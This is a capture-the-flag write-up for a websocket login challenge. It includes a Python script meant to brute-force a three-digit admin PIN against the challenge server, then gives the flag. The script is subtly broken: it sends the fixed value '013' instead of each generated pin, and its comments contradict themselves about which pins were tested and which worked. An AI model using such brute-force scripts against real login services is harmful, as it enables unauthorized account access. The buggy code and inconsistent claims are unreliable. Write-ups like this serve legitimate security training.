Websockets
Censored
Challenge
Can you hack my website?
Solution
Go to the site, we can see an employee login, go to that, we can see a username and pin field, hit inspect element and we see that Tom is an idiot who use 3 digit pins
Now we need to bruteforce that which should be pretty straight forward with a python script
#!/usr/bin/env python3
import time
from websocket import create_connection
url = "ws://web1.utctf.live:8651/internal/ws"
user = "admin"
pins = []
'''
this generator is borked, it doesnt
generate all possible pin combinations
instead it only goes from 012 -> 987
'''
def generate_pins(L):
for i in range(0, 10):
for j in range(0, 10):
for k in range(0, 10):
# check if the indexes are not
# same
if (i!=j and j!=k and i!=k):
pin = str(L[i]) + str(L[j]) + str(L[k])
pins.append(pin)
generate_pins([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
res = ""
'''
sending it all on one connection
leads to broken pipe so instead we
create a new connection for every
pin
'''
for pin in pins:
time.sleep(0.5)
ws = create_connection(url)
ws.send("begin")
ws.send("user " + user)
res = ws.recv()
ws.send("pass " + "013")
res = ws.recv()
print(pin + " - " + res)
if res != "badpass":
print(pin + " - goodpass")
ws.close()
'''
pins from 012 -> 987 dont work, pretty sure that's not all
possible pins tho :thinking:
nope just checked, thats not all possible pins
000 -> 987 all badpass confirmed
907 -> correct pin
'''
As said in the code, generate_pins() is borked so after running that and confirming all pins in range 012 -> 987 is incorrect, we can manually test the remaining pins which leads to 907 being the correct one
And ofcourse this can be optimized to run faster with threading and probably an actual working generate_pins() function as well
Flag
utflag{w3bsock3ts}